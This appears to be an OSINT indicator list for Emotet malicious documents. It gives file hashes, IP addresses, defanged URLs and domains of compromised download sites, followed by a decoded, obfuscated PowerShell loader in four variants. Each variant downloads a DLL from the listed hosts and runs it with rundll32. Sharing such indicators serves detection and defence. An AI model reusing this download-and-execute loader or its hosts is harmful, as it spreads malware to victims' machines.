Emotet_Doc_out_2021-01-05_14_34.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4. c32677479dab9138f3439c5a09f0d9b0a707b3aa71ccda84c297c2c0f5fad452
5. c03e40496eab8a1a6a0fa4220d0be3dbcee83db644a0d1b2cbdf53e80882da14
6. dc5ca596e8b79ce0402bc63258f8494a2e836700dedb32153708f7bc711e3fb4
7. dc5ca596e8b79ce0402bc63258f8494a2e836700dedb32153708f7bc711e3fb4
8. eee737a863a8bf2e4daaadc6445f779455582be07f1ba36c84a0bd27f5ad6751
9. eee737a863a8bf2e4daaadc6445f779455582be07f1ba36c84a0bd27f5ad6751
10. 79ec7021a000940cb40f6c4779aaf2cee64001b113a331794268252115a6c44d
11. 8a19fbc6a3bc08b9dd72d27bc8dbfb51401577914081abe961ab64ee67128d46
12. 40977b89d6a6667e3e77e68d8a87500fb5461c61c6aaab7355550246e0f03cd6
13. 40977b89d6a6667e3e77e68d8a87500fb5461c61c6aaab7355550246e0f03cd6
14. 436ca025416de5f2e4b98d6112bdcf6677f2c9398b8c7a2e1e644a5717916014
15. 436ca025416de5f2e4b98d6112bdcf6677f2c9398b8c7a2e1e644a5717916014
16. eaa2a7a6ead0fb817d96de5539291d86caf887cbba94836c246755105a7a1429
17. 706a19b0ff78fefb6808c5832c447d9a8283c62cc1ecbe98c8080d1cbba8b881
18. 706a19b0ff78fefb6808c5832c447d9a8283c62cc1ecbe98c8080d1cbba8b881
19. 41505a0b842a66d3fef94c776b368f11070d50c212c541fc50c51e7624b63bc5
20. 49a4678f9b33879cb16662dd5d05bc7e7ec713bbf6a85741a81f9e1e0f3c37f4
21. 49a4678f9b33879cb16662dd5d05bc7e7ec713bbf6a85741a81f9e1e0f3c37f4
22. a4aad5f9fbf0297950767fdd56e60306ddd25957d0f787ab3400f0b089edf97f
23. a4aad5f9fbf0297950767fdd56e60306ddd25957d0f787ab3400f0b089edf97f
24. 9f2a4217ac7bc2203e15e509f3fca89596b2cf721e858100103c8f967d39b612
25. 9f2a4217ac7bc2203e15e509f3fca89596b2cf721e858100103c8f967d39b612
26. 3d566983c8d1eebeb69ceafa423e493e04f3ca7fa686084e2c2e064a363a9d07
27. b10a960e8977a7b70533cbee4eb85803cde6da3e96f6b83f3ed90e1950ca002a
28. bd71cb5216319d67b7163d101b227e46c1b8172480c96aee9172be8670c32fbf
29. a5510a203c4d4cc423b2e4a321e9e2fd2a9b9afa62195780841d60cda74614af
30. 3403d31e29a2e9774675378eb335947934b2411cd2ef123125f70310e6a7308c
31. bf2f59ecb85a6029a908bdf90f5dae875e68196bf1987cf72959bd568355c702
32. 3a7192ae0a86e22de203cd0bd9c3b2ddae45e918207d4ad84f4cfe6b1d975c95
33. 269b7e9055041b22adcfd3f3d1d0a4711292eb08c8674a535071c2ccf27a31fd
34. 328547d8fbddaf5087390a97bb4bd2032672e5ebda3e6c867bb5093cde59cb5d
35. 7ab531ffdf05ec65c076a06ea4a7e92a3c02ccb479f866db344d9fc4abcad342
36. 38d17dfd9fc5d7eb04a6ed019750022081fd13b253d0eb08d92fd9109815ec52
37. e1ebbd14ee5b8c0e8f24ab2f32d70806cbad49852e703793b4235d8117dbf439
38. c909996e11aabb6f9003b0ca2e0e52d58c16777e4c7e6fc11aa6b599183dd7d4
39. f24de274099a159067700e313a638da70fcc4b38008d7315f5723181d0724427
40. 771ac1b506fa360b405de6d3b6947b0fa3e32159b35dc852efaf0eabf8cf6b75
41. 67b7c7f217354619c0ddaa92803967254a88e680d52aafbf813d0884bf2bcfd8
42. 403df2e81bbb1cbe0b761a68962a96d99082642fb0f7764a1f7ea057c7854988
43. 6aa8822f97a4b8c6f94cfea8ac81f0deffe57554498a897a22930d98366a5599
44. eea58b2b0043981ad90b971ebe83901ebcefceda806a25b6eaf21408b3d3a689
45. fa91514bcf7bf7d49942a9540a1d515095c09cd936dae7f0073647dff6249c37
46. 555882aa0c70bf9f62ae71584a9e5e18353d6126de19390f8c2859c15693764c
47. a26ff62a2264180c03ebf68a26120cadbcee3f53a4cc6dc7ad00d97ffd029c85
48. 7e02cee4970608058fda2b43e61217bcf29977b2f2339fc77ba5be871de1b130
49. c11b3260b89105272c919fd8e27cdbb61559283ffaf6b0da431de10d27887125
50. 8b925011335a9296e315e7b64f267020ce33b7ba7c00ea8c859f9ef911c9752f
51. 51f14ae7f8e54c7fe9572f8c9d28a8a6b793d85fdbd72b56d4233db93efacae9
52. 51f14ae7f8e54c7fe9572f8c9d28a8a6b793d85fdbd72b56d4233db93efacae9
53. 9be359c8e7dd9a3b5b245175a6f8dd0f06a45a9bacd216edd933572ca6fa3d52
54. 9be359c8e7dd9a3b5b245175a6f8dd0f06a45a9bacd216edd933572ca6fa3d52
55. 6f6017ad7e5d7a0a299caa7fc8a14d5a24383f81dc09f9c0dd571c9473af020f
56. 6f6017ad7e5d7a0a299caa7fc8a14d5a24383f81dc09f9c0dd571c9473af020f
57. bc31710591f55e8f19e5d9a0832dbac8685e577da94f44cb7efab1e17c730c09
58. c117ee4b0325e948b2914fc8b400782b97cd6409b0b6ff7663abcbe03bcd02b6
59. c117ee4b0325e948b2914fc8b400782b97cd6409b0b6ff7663abcbe03bcd02b6
60. 61b7b67766e528b2fb8bfaca8a4ee64bac2adce1d1160d5c52b84e131b9e8734
61. c4d979622647bc179ca385e15044d1a3d71643013b1413a46fe06f20bcd3ef44
62. c4d979622647bc179ca385e15044d1a3d71643013b1413a46fe06f20bcd3ef44
63. cf35df1d400868df50e48cf53807db3c941a7fa5f4fbd210becb87acd8bc72e6
64. cf35df1d400868df50e48cf53807db3c941a7fa5f4fbd210becb87acd8bc72e6
65. 79251159b9f14e17f66f0206b07ac7a9a696a3dd9e56aed33ef245bc1f28c6eb
66. 01bce41750258f3d232b9eb7fe7901a88167254f0fe956f557bb33aced7cfec5
67. 001e1ea7ab07c91d781f5c51cd2039efc3acaf9f3a7b4bad38979ad48ad2119c
68. 59a5bd5a89cb04636e5146b6637154636d8e608014dba50b76e584d9dbfeebee
69.  
70.  
71. IPs:
72. 103.237.147.16
73. 104.28.2.144
74. 104.28.3.144
75. 162.241.148.243
76. 172.67.189.241
77. 173.254.250.226
78. 191.6.212.159
79. 202.92.7.113
80. 210.56.52.6
81. 35.214.199.246
82. 40.119.6.228
83. 72.167.241.46
84. 90.160.138.175
85.  
86.  
87.  
88. URLs:
89. hxxps://slimfitcaps.com/wp-content/iLkG5/
90. hxxp://singaedental.vn/wp-content/lQ/
91. hxxp://izitienda.com/content/h9b/
92. hxxp://frontechonline.com/downloads/D/
93. hxxp://contactscorporation.com/wp-content/W3/
94. hxxps://indopakgroceries.com/cgi-bin/S/
95. hxxp://complianceceo.com/wp-content/OX/
96. hxxps://fathekarim.com/images/jiC/
97. hxxps://trumpcommunity.com/usa-no-uykjh/wcS/
98. hxxps://comunicacaovertical.com.br/agencia/D0sJl/
99. hxxp://datawyse.net/5VGI0/
100. hxxp://transfersuvan.com/wp-admin/1114R/
101. hxxp://upafrique.com/cgi-bin/iFmg/
102. hxxps://radioclype.scola.ac-paris.fr/wp-admin/js/widgets/6S/
103. hxxps://admintk.com/wp-admin/L/
104. hxxps://mikegeerinck.com/c/YYsa/
105. hxxp://freelancerwebdesignerhyderabad.com/cgi-bin/S/
106. hxxp://etdog.com/wp-content/nu/
107. hxxps://www.hintup.com.br/wp-content/dE/
108. hxxp://www.stmarouns.nsw.edu.au/paypal/b8G/
109. hxxp://wm.mcdevelop.net/content/6F2gd/
110. hxxp://etbnaman.com/wp-admin/V0Sv/
111. hxxp://spovahealth.com/z/Vb/
112. hxxp://youyouwj.com/b/HW/
113. hxxp://labasedespatriotes.net/wp-content/tGjE/
114. hxxp://anakhita.com/wordpress/Pt/
115. hxxp://ezdesigns.net/ALFA_DATA/h/
116. hxxp://menol.eu/wp/mT/
117.  
118.  
119. Domains:
120. slimfitcaps.com
121. singaedental.vn
122. izitienda.com
123. frontechonline.com
124. contactscorporation.com
125. indopakgroceries.com
126. complianceceo.com
127. fathekarim.com
128. trumpcommunity.com
129. comunicacaovertical.com.br
130. datawyse.net
131. transfersuvan.com
132. upafrique.com
133. radioclype.scola.ac-paris.fr
134. admintk.com
135. mikegeerinck.com
136. freelancerwebdesignerhyderabad.com
137. etdog.com
138. www.hintup.com.br
139. www.stmarouns.nsw.edu.au
140. wm.mcdevelop.net
141. etbnaman.com
142. spovahealth.com
143. youyouwj.com
144. labasedespatriotes.net
145. anakhita.com
146. ezdesigns.net
147. menol.eu
148.  
149.  
150. Decoded Base64 Powershell:
151. 1��>��^�>��^�<�?�^,�]z sv "J""Sfa5" [TyPe]"{3}{1}{0}{2}{4}{5}" -FO,sTEM.i,.DI,Sy,R,eCToRy ;
152. sv "z""PN1A" [tYPe]"{2}{1}{6}{4}{0}{5}{3}{7}" -f icEpO,eM.neT,sysT,MAn,V,Int,.SER,AgEr ;
153. $ErrorActionPreference = SilentlyContinue;
154. $Sjgbbc0=$D0_C [char]64 $N6_H;
155. $E62Z=O31M;
156. $jSfA5::"CrE`ATedI`REcto`RY"$HOME XOkMo_vgtdXOkA13oj_sXOk -crepLACe XOk,[cHar]92;
157. $J25P=E6_S;
158. Gci vARiABLe:ZpN1a .ValUE::"s`E`cu`RITYpro`TOCoL" = Tls12;
159. $A99M=E20R;
160. $D4zszrc = Y14K;
161. $Q41X=E36T;
162. $Qh40emz=$HOMEwEqMo_vgtdwEqA13oj_swEq."r`epl`Ace"wEq,\$D4zszrc.dll;
163. $A64J=A63Q;
164. $B5pc73a=hxxps://slimfitcaps.com/wp-content/iLkG5/
165. hxxp://singaedental.vn/wp-content/lQ/
166. hxxp://izitienda.com/content/h9b/
167. hxxp://frontechonline.com/downloads/D/
168. hxxp://contactscorporation.com/wp-content/W3/
169. hxxps://indopakgroceries.com/cgi-bin/S/
170. hxxp://complianceceo.com/wp-content/OX/."r`E`PLACe"hxxp,[array]sd,sw,hxxp,3d[1]."sp`lit"$L88A $Sjgbbc0 $L55O;
171. $H9_G=V51M;
172. foreach $Kma71ma in $B5pc73a{try{.New-Object sySteM.nEt.WeBclienT."dOWN`L`Oa`Dfile"$Kma71ma, $Qh40emz;
173. $U3_D=R96T;
174. If &Get-Item $Qh40emz."L`EN`gTH" -ge 48192 {&rundll32 $Qh40emz,Control_RunDLL."toSt`R`INg";
175. $V88Y=R14T;
176. break;
177. $V__A=N14C}}catch{}}$K92Y=S62Y<�?�^,�]z set-ITEm vARiAblE:CgIja [tYpe]"{1}{0}{3}{2}"-f tE,sys,iO.dIreCTorY,m. ;
178. $7jaD= [TypE]"{2}{3}{0}{4}{6}{1}{5}" -fc,nTManAge,sySTE,M.neT.sERvI,ePo,R,I;
179. $ErrorActionPreference = SilentlyContinue;
180. $Oix5v32=$H73M [char]64 $F22I;
181. $I59W=J49Z;
182. $CGIjA::"CREA`Te`DiRe`CTORY"$HOME SInShfku8tSInWnwspx3SIn -CReplACE SIn,[CHAR]92;
183. $Q5_Z=T19M;
184. Get-vARIAblE 7JAd -vaLUEonL ::"sECur`iT`Yp`RotocoL" = Tls12;
185. $T_6H=A74J;
186. $Xih8ddp = A1_H;
187. $C81T=D88C;
188. $De8163y=$HOMEx31Shfku8tx31Wnwspx3x31 -crePLAce [CHAr]120[CHAr]51[CHAr]49,[CHAr]92$Xih8ddp.dll;
189. $X73U=E57K;
190. $D9dez_d=hxxps://fathekarim.com/images/jiC/
191. hxxps://trumpcommunity.com/usa-no-uykjh/wcS/
192. hxxps://comunicacaovertical.com.br/agencia/D0sJl/
193. hxxp://datawyse.net/5VGI0/
194. hxxp://transfersuvan.com/wp-admin/1114R/
195. hxxp://upafrique.com/cgi-bin/iFmg/
196. hxxps://radioclype.scola.ac-paris.fr/wp-admin/js/widgets/6S/."rEpL`A`Ce"hxxp,[array]sd,sw,hxxp,3d[1]."SPl`iT"$K_6H $Oix5v32 $V14L;
197. $P58K=B1_H;
198. foreach $F2q6yoz in $D9dez_d{try{.New-Object systEM.nEt.WeBclIeNT."DoWnl`Oa`d`FILE"$F2q6yoz, $De8163y;
199. $C35O=K46J;
200. If .Get-Item $De8163y."lE`Ngth" -ge 37293 {.rundll32 $De8163y,Control_RunDLL."TO`sTr`InG";
201. $K79E=G82K;
202. break;
203. $I35D=Y03Z}}catch{}}$L48L=O_7E<�?�^,�]z sEt MKu [TYPe]"{0}{1}{2}{4}{3}" -F SYsT,eM.,io.DI,ORY,rECt ;
204. SeT-iTEM vaRIabLE:mBu [TYPe]"{6}{8}{0}{3}{4}{5}{2}{7}{1}" -fSteM,Ger,Ma,.n,et.seRVIcepOi,nt,s,NA,Y;
205. $ErrorActionPreference = SilentlyContinue;
206. $Cvmmq4o=$Q26L [char]64 $E16H;
207. $J16J=N_0P;
208. DIr VariabLE:Mku .VaLUe::"c`REAt`edI`REC`TORy"$HOME {0}Db_bh30{0}Yf5be5g{0} -F [chAR]92;
209. $C39Y=U68S;
210. vARiaBLe "m""bu" -VAlueoN ::"sEcuRITYproT`o`c`ol" = Tls12;
211. $F35I=I4_B;
212. $Swrp6tc = A69S;
213. $X27H=C33O;
214. $Imd1yck=$HOMEUOHDb_bh30UOHYf5be5gUOH."ReP`lACe"UOH,[StrInG][chAr]92$Swrp6tc.dll;
215. $K47V=R49G;
216. $B9fhbyv=hxxps://admintk.com/wp-admin/L/
217. hxxps://mikegeerinck.com/c/YYsa/
218. hxxp://freelancerwebdesignerhyderabad.com/cgi-bin/S/
219. hxxp://etdog.com/wp-content/nu/
220. hxxps://www.hintup.com.br/wp-content/dE/
221. hxxp://www.stmarouns.nsw.edu.au/paypal/b8G/
222. hxxp://wm.mcdevelop.net/content/6F2gd/."RE`p`lACe"hxxp,[array]sd,sw,hxxp,3d[1]."s`PLIT"$C83R $Cvmmq4o $F10Q;
223. $Q52M=P05K;
224. foreach $Bm5pw6z in $B9fhbyv{try{&New-Object SysTem.nEt.WEBcLIeNT."do`WNl`OaD`FIlE"$Bm5pw6z, $Imd1yck;
225. $Z10L=A92Q;
226. If &Get-Item $Imd1yck."len`G`TH" -ge 35698 {&rundll32 $Imd1yck,Control_RunDLL."T`OSt`RiNG";
227. $R65I=Z09B;
228. break;
229. $K7_H=F12U}}catch{}}$W54I=V95O<�?�^,�]z set BY1 [Type]"{0}{1}{3}{5}{4}{2}" -f sYS,tem.,ory,iO.DI,eCT,R ;
230. Sv snf5 [tyPE]"{5}{2}{0}{4}{7}{6}{8}{3}{1}" -fM.,R,StE,TMaNaGe,n,sY,.SERvIcE,eT,PoIn ;
231. $ErrorActionPreference = SilentlyContinue;
232. $Io_k9jz=$D_0U [char]64 $Y13O;
233. $L79U=S49R;
234. VARiabLE by1 -VAlUeonl ::"cRe`AT`eDIR`eCto`RY"$HOME 0xuGh4952x0xuOuda02n0xu."Re`Pl`Ace"0xu,[String][char]92;
235. $S10D=M68N;
236. Get-chIldITEm VaRIAbLe:SNF5 .vALUe::"SE`CUR`iT`YprOTo`cOl" = Tls12;
237. $Y71Q=A40G;
238. $Wxrdiwq = E75Y;
239. $A39I=S32E;
240. $Z_58os0=$HOME{0}Gh4952x{0}Ouda02n{0}-f [CHar]92$Wxrdiwq.dll;
241. $C29T=L48D;
242. $Vcw2pkb=hxxp://etbnaman.com/wp-admin/V0Sv/
243. hxxp://spovahealth.com/z/Vb/
244. hxxp://youyouwj.com/b/HW/
245. hxxp://labasedespatriotes.net/wp-content/tGjE/
246. hxxp://anakhita.com/wordpress/Pt/
247. hxxp://ezdesigns.net/ALFA_DATA/h/
248. hxxp://menol.eu/wp/mT/."rePl`ACe"hxxp,[array]sd,sw,hxxp,3d[1]."sPl`iT"$V72P $Io_k9jz $J56J;
249. $C80U=H84D;
250. foreach $U_33a2c in $Vcw2pkb{try{.New-Object sysTEm.Net.WEBCliEnt."d`owNlO`A`dFile"$U_33a2c, $Z_58os0;
251. $S60A=X72Y;
252. If &Get-Item $Z_58os0."LEng`TH" -ge 47015 {&rundll32 $Z_58os0,Control_RunDLL."TOS`T`RiNg";
253. $Y31M=B32A;
254. break;
255. $S92N=F_9B}}catch{}}$A65G=T27H���������?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^�
256.